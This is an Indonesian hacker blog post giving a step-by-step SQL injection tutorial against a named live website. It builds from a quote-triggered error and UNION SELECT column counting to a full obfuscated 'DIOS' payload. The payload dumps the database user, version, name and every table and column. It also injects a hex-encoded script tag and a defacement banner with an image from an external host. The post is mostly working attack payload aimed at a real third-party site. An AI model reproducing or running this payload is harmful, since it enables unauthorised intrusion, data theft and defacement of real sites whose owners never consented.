Featured Post
oke guys kembali lagi bersama saya ./numb_404 lebih tepatnya sering dipanggil aqil.
kali ini saya mau membahas tentang sql local variable !
kalo ga tau apa itu local variable cari di google aja,banyak.
nahh saya kasih live target oke.
live target => https://www.ghanatimber.org/certification_details.php?id=12
pada tampilan awal terlihat seperti ini.
jangan hiraukan iklan dibawah okee
setiap pengertian dan cara inject sudah saya jelaskan di SQL Postgre, mulai dari,
1.apa itu tanda petik(') serta kegunaanya.
2.apa itu (--+-) serta kegunaannya.
3.apa itu (ORDER BY) serta kegunaanya.
4.apa itu (UNION SELECT) serta kegunaanya.
ºººWARNINGººº
jika tidak tau dari 1-4 point di atas, dipastikan kalian lihat Toturial SQL postgre yang saya buatkan materinya.
LANJUT
https://www.ghanatimber.org/certification_details.php?id=12
oke kita coba inject
=>https://www.ghanatimber.org/certification_details.php?id=12'
oke error dan ini tampilannya
Angka 9
Angka 8
oke target kita ada di angka 8 dan tinggal UNION SELECT, jika kalian tidak tau apa itu UNION SELECT maka kalian diwajibkan untuk melihat materi postgre.
LANJUT
*UNION SELECT*
=> https://www.ghanatimber.org/certification_details.php?id=12 AND 0 UNION SELECT 1,2,3,4,5,6,7,8%23
dan ini tampilannya
Error
dan setelah di kasih MOD(9,9)
dan boom keluar angka 5 dan 3
silahkan tampel dios kalian di angka 5 atau 3
loh kok diosnya ga ada bang ?
kok angka ajaibnya masih ada bang ?
nah panggil dios kalian
cara=> di angka togel yaitu 5/3 kalian hapus dan ketik (@terserah)
nahh jadinya gini
=> https://www.ghanatimber.org/certification_details.php?id=12 AND MOD(9,9) div@terserah:=(/*!50000concat/**8**/*/(0x3c62723e,0x3c7363726970743e70726f6d707428227b202e2f6e756d625f343034207d222c646f63756d656e742e646f6d61696e293c2f7363726970743e,0x3C696D67207372633D2268747470733A2F2F672E746F7034746F702E696F2F705F323030327175336266302E6A70656722206865696768743D223930222077696474683D223930223E,0x3c666f6e7420636f6c6f723d22726564223e3c623e,0x494E4A4543544544204259202E2F6E756D625F343034,0x3c2f623e,0x3c2f666f6e743e,0x3c62723e,0x557365723a3a,current_user,0x3c62723e,0x56657273696f6e3a3a,version(),0x3c62723e,0x44617461626173653a3a,database/*data*//**8**/(),0x3c62723e,0x3c62723e,(select(@x)/*!50000from/**8**/*/(/*!50000select/**8**/*/(@x:=0x00),(select(0)/*!From/**8**/*/(/*!50000information_schema.columns/**8**/*/)/*!50000where/**8**/*/(table_schema=database/*data*//**8*/())and(0x00)in(@x:=/*!50000coNcat/**8**/*/(@x,0x3c6c693e,/*!50000table_name/**8**/*/,0x3a3a,/*!50000column_name/**8**/*/))))x))) /*!50000UNION*/ SELECT 1,2,3,4,@terserah,6,7,8%23
dan boom liat tampilannya
Related Posts
Post a Comment
Archive
- December 2021 (3)
- November 2021 (3)
- October 2021 (2)
- September 2021 (8)
- August 2021 (4)
- July 2021 (6)
- April 2021 (12)
- March 2021 (12)
- February 2021 (14)
Popular
-
Ok guys Kembali lagi bersama gua ./numb_404 Guys Ya, oke kali ini gua akan memberikan tutorial SQL…
-
Assalamualaikum wr.wb Kali ini saya akan memberikan sedikit materi tentang membikin/membuat server…
-
Assalamualaikum wr wb Oke guys kembali lagi bersama gw Lkey7,Disini gw mau share tools BCA v2. Ma…